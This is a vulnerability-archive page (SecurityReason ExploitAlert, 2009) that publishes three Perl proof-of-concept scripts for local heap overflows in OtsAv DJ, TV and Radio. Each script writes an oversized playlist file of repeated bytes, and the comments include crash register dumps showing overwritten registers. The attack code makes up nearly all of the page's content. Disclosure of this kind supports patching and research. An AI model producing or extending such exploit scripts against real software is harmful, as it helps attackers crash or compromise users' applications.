SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow ExploitAlert Database

Arrow  Topic :

OtsAv DJ/TV/Radio Multiple Local Heap Overflow PoCs


Arrow  ExploitAlert : 6573
  SecurityAlert : 6705 (Exploit Details)
  Milw0rm ID : 9113
Arrow  Credit : Stack
Arrow  Date : 11.07.2009

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

----------------------------------the first
Poc------------------------------------
#!/usr/bin/perl
# OtsAv DJ [.olf] Local Heap Overflow Poc
# Down :
http://serv-08.download.otszone.com/download.cgi/otsavdjtrialsetup.exe?A=13
JTHRVWJLLLZ5JG2AYRNSMN%2DWJMQXDJKA%2DRFQ&otsavdjtrialsetup.exe
# Desc : 7000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >> Import List >> As playlist >>
# BOOOOOOOOOOOOOOOOOOOM
# register of 7000 A'
# EAX 41414141
# ECX 00E5448C OtsAVDJt.00E5448C
# EDX 41414141
# EBX 00E54488 OtsAVDJt.00E54488
# ESP 02C6FE1C
# EBP 00E0D328 OtsAVDJt.00E0D328
# ESI 00000000
# EDI 0174C070 ASCII
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAA
# EIP 0046266C OtsAVDJt.0046266C
# register of 2000 A'
# EAX 41414141
# ECX 00001B05
# EDX 02FAF730
# EBX 0000042A
# ESP 02FAF9C8
# EBP 00000000
# ESI 020FAFEA
# EDI 02FAFEAA
# EIP 0043C8D7 OtsAVDJt.0043C8D7
use strict;
use warnings;
my $A= "\x41" x 7000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
$A.
"\r\n";
close $ofl_playlist;
-------------------------------Second
Poc-----------------------------------------------------

#!/usr/bin/perl
# OtsAv TV [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/tv/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >> Import List >> As playlist >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 00009AF0
# EDX 03A0F730
# EBX 0000042A
# ESP 03A0F9C8
# EBP 00000000
# ESI 02CD7102
# EDI 03A0FEAA
# EIP 0043C8D7 OtsAVTVt.0043C8D7
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
$A.
"\r\n";
close $ofl_playlist;
----------------------------------- 3
POC-------------------------------------------------
#!/usr/bin/perl
# OtsAv Radio [.olf] Local Heap Overflow Poc
# Down : http://www.otsav.com/buy/radio/
# Desc : 2000 A' Heap overflow
# By Mountassif Moad a.k.a Stack
# v4 Team & evil finger
# Open Stack.ofl >> File >> Import List >> As playlist >>
# BOOOOOOOOOOOOOOOOOOOM
# EAX 45454545
# ECX 0000CD32
# EDX 0224F730
# EBX 00000452
# ESP 0224F9C8
# EBP 00000000
# ESI 00C8E0EA
# EDI 0224FED2
# EIP 0043B497 OtsAVRDt.0043B497
use strict;
use warnings;
my $A= "\x45" x 2000;
open(my $ofl_playlist, "> stack.ofl");
print $ofl_playlist
$A.
"\r\n";
close $ofl_playlist;





Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server
Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability
PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)
ADT

Protect your family and valuables with Home Security Systems
Copyright © SecurityReason.com. All Rights Reserved.